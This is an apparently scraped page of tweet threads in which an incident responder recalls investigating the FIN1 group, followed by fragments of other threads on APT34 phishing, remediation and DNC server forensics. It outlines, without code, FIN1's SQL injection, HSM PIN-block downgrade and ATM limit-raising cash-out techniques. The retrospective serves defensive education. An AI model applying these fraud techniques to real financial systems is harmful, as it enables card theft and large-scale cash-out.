Reading justice.gov/opa/pr/russian… today reminded me how I got my start in #DFIR in 2008 investigating FIN1. Let's take a walk down memory lane.
FIN1 (in my experience) has had a few major periods of activity (2007-2009, 2011-2012, and 2014-2015) - each with their own distinct set of TTPs. They've significantly improved their capabilities over the years (even though multiple members have been arrested)
FIN1 in the first period had the following TTPs: 1) didn't use backdoors 2) broke in commonly via SQL Injection 3) uploaded new tools by creating temporary tables and exporting the file via BCP 4) deployed a sniffer named sn.exe to identify systems with track data in memory
FIN1 already had intimate knowledge of financial orgs - including how debit card PINs were encrypted, and the hardware security module (HSM) devices and protocols used to encrypt/decrypt the PIN numbers.
I once observed FIN1 identify the HSM, enumerate the protocols it supported, and use it to execute an encryption protocol downgrade attack. The benefit was - they turned a PIN block (an encrypted version of a PIN) that used salting - to a version with no salt applied.
This allowed FIN1 to then calculate every permutation of PINs (e.g 0000 to 9999) with the downgraded encryption protocol - and then perform a lookup against the downgraded PIN blocks.
FIN1 also knew enough about how financial orgs limited ATM withdrawals - & knew (or figured out how) to increase database limits that control # withdrawals per ATM, # withdrawals per day & total amount allowed per day. They increased limits to max amount - and cashed out millions
FIN1 only needed 20-30 cards w/ increased values to perform the cash out. My theory was - they gave a single debut card number to a cash out team. That way they could query the db and know exactly how much that "team" stole - so they could payment % back to the central org
FIN1 in this period was characterized by low opsec, significant knowledge of fin systems/orgs (they might have worked in fin orgs before) & for me at time as a pen tester who knew SQLi really well - FIN1 had amazing SQLi capabilities. They did things I had no idea were possible
• • •
Missing some Tweet in this thread? You can try to
force a refresh
C-level credential phished while on vacation - APT34 used account access to phish entire company. Even though infosec team blocked URL on web proxy - employees switched to guest wi-fi to access the URL.
Remediation strategy in #DFIR is always a fun topic - with many opinions & not always a clear rule book to follow. It's like the English language for every rule there are 5 exceptions. My views have evolved over time - from combo of experience & as monitoring tools have improved
If you catch attacker early in attack lifecycle - this one is pretty easy. Take action immediately before they get a strong foothold. Very few exceptions to this rule. Tipoffs you are early in attack lifecycle. Malware owned by primary user of system or malware in startup folder
Opposite end of spectrum - if attacker has been there for months/years - it will take at the very (and I mean very) least a few days to get bare minimum handle on infected systems & how accessing the environment. Bigger challenge is client ability to take "big" remediation steps
Here is a thread on the "missing" DNC server and my experience/advice from conducting similar investigations.
First, some background for my comments. Over the last decade, I've personally led investigations at over 100 organizations & taught dozens of classes for both federal law enforcement and the private sector on incident response and digital forensics.
I've never once physically acquired a server or asked someone to physically acquire a server. Literally the first thing you learn in digital forensics is how to take a forensic image (or in laymen's terms a complete copy of a computer).